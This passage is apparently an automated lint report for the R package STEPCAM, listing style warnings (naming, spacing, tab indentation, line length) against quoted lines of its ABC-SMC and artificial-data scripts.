\n^~~~~~\n```\n[R/ABC_SMC.R:198:19:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L198) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:199:19:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L199) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:200:19:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L200) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:14:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:18:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:17:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L204) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:17:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:206:17:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L206) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:24:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:40:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L209) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:211:24:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:40:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L211) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:212:13:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:27:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:13:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L216) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:216:14:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:34:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:21:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L222) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:222:22:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:224:13:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:38:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:242:54:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L242) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:245:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L245) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:9:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:32:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L246) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L249) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:250:20:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:20:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:20:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:61:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L262) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:266:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L266) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"Can't stop at iteration 1 - please set stop_at_iteration to 2 if you only want to generate from the prior\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 